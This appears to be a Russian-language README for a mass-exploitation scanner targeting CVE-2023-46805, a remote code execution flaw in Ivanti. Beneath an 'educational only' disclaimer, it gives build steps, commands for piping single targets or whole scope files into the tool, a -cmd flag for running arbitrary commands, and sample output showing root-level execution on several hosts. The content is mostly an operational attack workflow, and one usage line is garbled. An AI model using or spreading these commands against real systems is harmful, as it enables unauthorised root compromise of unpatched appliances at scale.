
CVE-2023-46805 Ivanti POC RCE - Ультрабыстрый сканер.
Название: Доказательство концепции для CVE-2023-46805 — Только для образовательных целей
Лицензия: Эта работа размещена в соответствии с Международной лицензией Creative Commons Attribution 4.0 (CC BY 4.0). Вы можете свободно делиться, копировать, распространять и передавать эту работу, адаптировать её или использовать для других целей, при условии надлежащего указания авторства.
Отказ от ответственности: Это доказательство концепции (PoC) предоставлено только для образовательных целей и исследовательских целей в области кибербезопасности. Ни автор, ни аффилированная организация, ни любая другая сторона, участвующая в создании, производстве или предоставлении этого контента, не несут ответственности за любые убытки, включая, но не ограничиваясь: прямые, косвенные, случайные, особые, косвенные или штрафные убытки, возникшие в результате использования или невозможности использования этого контента.
Образовательная цель: Этот PoC предназначен для помощи сообществу кибербезопасности в понимании и смягчении уязвимости, идентифицированной как CVE-2023-46805. Его не следует использовать в производственной среде или для злонамеренных действий.
Описание уязвимости: Ivanti RCE
Детали PoC:
Usage of ./CVE-Ivanti:
-cmd string
The command to replace 'id' in the payload (default "id")
-t int
Number of concurrent threads (default 5)
go build
echo "https://1.2.3.4" | ./CVE-Ivanti
https://1.2.3.4 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
cat myscope.txt -t 5 | ./CVE-Ivanti
https://ssl1.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
https://ssl3.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
echo "https://1.2.3.4" | ./CVE-Ivanti -cmd 'ls /'